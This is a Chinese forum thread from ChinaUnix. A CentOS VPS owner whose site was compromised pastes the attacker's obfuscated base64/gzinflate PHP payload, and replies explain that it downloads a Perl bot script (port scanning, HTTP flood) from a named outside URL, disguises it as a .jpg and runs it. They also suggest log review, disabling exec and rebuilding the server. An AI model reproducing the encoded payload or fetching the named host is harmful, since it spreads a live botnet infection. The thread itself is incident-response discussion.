免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
论坛 操作系统 Linux系统管理 centos VPS被入侵,我该怎么处理?
123下一页
最近访问板块 发新帖
查看: 7665 | 回复: 28
打印 上一主题 下一主题

[系统安全] centos VPS被入侵,我该怎么处理? [复制链接]

centos64

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2013-05-29 13:12 |只看该作者 |倒序浏览
本帖最后由 centos64 于 2013-05-29 13:18 编辑

这个黑客昨天在我的网站根目录放了若干个文件,然后我的站点任何一个页面打开就只出现一个图片无法显示的红X。

查看网页源码,它把下面的字符串经过 eval(gzinflate(str_rot13(base64_decode('这里放的是下面字符串')))) N重加密

3ZjNd4NAGFL3hb6DuyQFNb+lNEO6KV1p032w+hktk5nBGXhPyLs3LU2NV4jTht5pF4ODB8M9HBKH/TDlvo4FX9A6SU31e7QmvzcYeS8v7j8+9nvZkrQVdi1iXTfLMicg4SmicVJZOJy5mbR9wTVk7VeWLnCu3BehHSaWlv1xbKPr8Sz0pjfXs+F1U8PpzSQcQib+iz8dBU4wZ17lZS4pbifd2RvMv7j8Z3/IkFickYvtHxyIjDPhBZbtGSKekWLD15atUZr4cQhqalO8kLQfnfoLmfGbgT0+PJs97u58LytMTGkSaZ9BYLltJeew0875Qyde8KFC/YsTe/IFJuz0C0BgBcQ8oLUjI+lctZEbiuKbfulj/BC7+8Hd5QUxUmRY0aiIGFtHuqb8ArFhqmdrAqzS4ervgBJIfkhVQPVI8bDESiXreaiDbMFpQxsltgzwm6iV9i/IAbiP2jBkckTrklMzHbn3F+1xQ0SGDCe01FN2TRUd9WwB2UM5GaAyZjJgWhaEsHfMARFomKOBKTCn6mGjb1O4nUcjxB38H+ijOim6AJC7qIb4D4Xw5iXHcKr2Cr56n+4hZjRypKeUjpI0j5niEjF0VzY8v5V5uHOrMKI6rVEEtEwJh+WxkquzXCqTgo2bJiPy/PEDp4UVXwfAkdOEBNdQo0R+USDGf7B5au8=

网友帮我解密后代码如下:



我的理解是他把代码放在了图片里,然后在我的目录里面执行了这些代码,我想获取这个图片看他到底做了什么但是我不知道该怎么获取。



PS:后来我把这些文件删除了,我发现除了昨天,前几天这个人还放了其他一些文件到我的服务器,并且那时候访问我的网站任何页面都非常卡,重启服务器后情况缓解,但过一段时间又变得非常卡,不知道是不是这个黑客又进行了某些操作导致的。

请问

1.能否有兄弟帮我找到这个图片并翻译成代码

2.他是通过什么手段入侵我的服务器的?

3.要这么做好服务器安全措施,以防再次被攻击?

4.能否推荐一些服务器安全的经典书,鸟哥的linux私房菜:服务器架设篇  ,这本书能解决问题吗、

先谢谢大家了!
lbseraph

论坛徽章:
48
15-16赛季CBA联赛之青岛 日期:2021-01-07 13:41:2315-16赛季CBA联赛之上海 日期:2020-12-01 18:02:0720周年集字徽章-20 日期:2020-10-28 14:14:2620周年集字徽章-20 日期:2020-10-28 14:04:3015-16赛季CBA联赛之天津 日期:2020-10-18 22:51:412016猴年福章徽章 日期:2016-02-18 15:30:3415-16赛季CBA联赛之北控 日期:2015-12-22 13:30:48操作系统版块每日发帖之星 日期:2015-12-07 06:20:00操作系统版块每日发帖之星 日期:2015-09-04 06:20:002015亚冠之德黑兰石油 日期:2015-08-05 18:46:082015年亚洲杯之巴勒斯坦 日期:2015-04-19 10:42:502015年亚洲杯之巴林 日期:2015-04-09 08:03:23
2 [报告]
发表于 2013-05-29 13:27 |只看该作者
他是把http://www.deoaseermelo.nl/wp-content/plugins/bot.log的内容输出成那个jpg的文件,然后用perl执行而已。代码你直接看http://www.deoaseermelo.nl/wp-content/plugins/bot.log就可以。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
chenyx

论坛徽章:
381
CU十二周年纪念徽章 日期:2014-01-04 22:46:58CU大牛徽章 日期:2013-03-13 15:32:35CU大牛徽章 日期:2013-03-13 15:38:15CU大牛徽章 日期:2013-03-13 15:38:52CU大牛徽章 日期:2013-03-14 14:08:55CU大牛徽章 日期:2013-04-17 11:17:19CU大牛徽章 日期:2013-04-17 11:17:32CU大牛徽章 日期:2013-04-17 11:17:37CU大牛徽章 日期:2013-04-17 11:17:42CU大牛徽章 日期:2013-04-17 11:17:47CU大牛徽章 日期:2013-04-17 11:17:52CU大牛徽章 日期:2013-04-17 11:17:56
3 [报告]
发表于 2013-05-29 14:04 |只看该作者
鸟哥的书讲的是基础,入侵检测还行找别的资料.
至于他是如何入侵的,仔细检查下你的web日志,重点关注post上传的操作.
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
chenyx

论坛徽章:
381
CU十二周年纪念徽章 日期:2014-01-04 22:46:58CU大牛徽章 日期:2013-03-13 15:32:35CU大牛徽章 日期:2013-03-13 15:38:15CU大牛徽章 日期:2013-03-13 15:38:52CU大牛徽章 日期:2013-03-14 14:08:55CU大牛徽章 日期:2013-04-17 11:17:19CU大牛徽章 日期:2013-04-17 11:17:32CU大牛徽章 日期:2013-04-17 11:17:37CU大牛徽章 日期:2013-04-17 11:17:42CU大牛徽章 日期:2013-04-17 11:17:47CU大牛徽章 日期:2013-04-17 11:17:52CU大牛徽章 日期:2013-04-17 11:17:56
4 [报告]
发表于 2013-05-29 14:04 |只看该作者
至于如何修补漏洞,得看看他是如何取得权限的,然后再让程序员修改源代码.
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
milujite

论坛徽章:
7
双子座 日期:2013-09-09 15:55:31CU大牛徽章 日期:2013-09-18 15:22:06CU大牛徽章 日期:2013-09-18 15:22:20CU大牛徽章 日期:2013-09-18 15:22:26CU大牛徽章 日期:2013-09-18 15:22:31CU大牛徽章 日期:2013-09-18 15:22:37CU大牛徽章 日期:2013-09-18 15:22:46
5 [报告]
发表于 2013-05-29 17:00 |只看该作者
本帖最后由 milujite 于 2013-05-29 17:21 编辑

看这段代码就是尝试使用WGET、CURL、LWP模块、lynx下载那个bot.log保存为JPG,对Linux来说扩展名其实就是浮云,然后PERL执行那个所谓的JPG,其实是执行BOT.LOG脚本内容。bot.log里都是攻击代码包括什么端口扫描啊,httpflood等。有必要的话先关闭httpd的perl扩展吧,然后重启httpd服务器,在慢慢折腾。因为这些脚本都是依赖PERL的。另外,你的机器应该是被缓冲区溢出了,被当肉鸡了。这个脚本的权限很高。建议重新搭环境吧,选新点的稳定点的版本。


实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
centos64

论坛徽章:
0
6 [报告]
发表于 2013-05-29 17:09 |只看该作者
回复 2# lbseraph


    感谢回复兄弟,这个文件我尝试很多次都无法打开不知道怎么回事。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
centos64

论坛徽章:
0
7
发表于 2013-05-29 17:11
回复 5# milujite


    感谢回复兄弟,如果把perl关闭会不会影响到其他功能呢,我的服务器主要是运行一个网站。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
centos64

论坛徽章:
0
8
发表于 2013-05-29 17:13
回复 4# chenyx


    感谢回复兄弟,我试试,web日志指apache日志吗(我的站点用的是apache)
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
milujite

论坛徽章:
7
双子座 日期:2013-09-09 15:55:31CU大牛徽章 日期:2013-09-18 15:22:06CU大牛徽章 日期:2013-09-18 15:22:20CU大牛徽章 日期:2013-09-18 15:22:26CU大牛徽章 日期:2013-09-18 15:22:31CU大牛徽章 日期:2013-09-18 15:22:37CU大牛徽章 日期:2013-09-18 15:22:46
9 [报告]
发表于 2013-05-29 17:13 |只看该作者
centos64 发表于 2013-05-29 17:11
回复 5# milujite

看你是什么网站有没PERL代码了。
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
chenyx

论坛徽章:
381
CU十二周年纪念徽章 日期:2014-01-04 22:46:58CU大牛徽章 日期:2013-03-13 15:32:35CU大牛徽章 日期:2013-03-13 15:38:15CU大牛徽章 日期:2013-03-13 15:38:52CU大牛徽章 日期:2013-03-14 14:08:55CU大牛徽章 日期:2013-04-17 11:17:19CU大牛徽章 日期:2013-04-17 11:17:32CU大牛徽章 日期:2013-04-17 11:17:37CU大牛徽章 日期:2013-04-17 11:17:42CU大牛徽章 日期:2013-04-17 11:17:47CU大牛徽章 日期:2013-04-17 11:17:52CU大牛徽章 日期:2013-04-17 11:17:56
10 [报告]
发表于 2013-05-29 17:14 |只看该作者
对,apache就看apache的日志.
你要是apache+php的话,exec函数要是没有用,可以在php.ini里面禁用.网上有相关的文章,你搜索下吧
实战分享:从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线! | 新一代分布式关系型数据库RadonDB知多少?
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP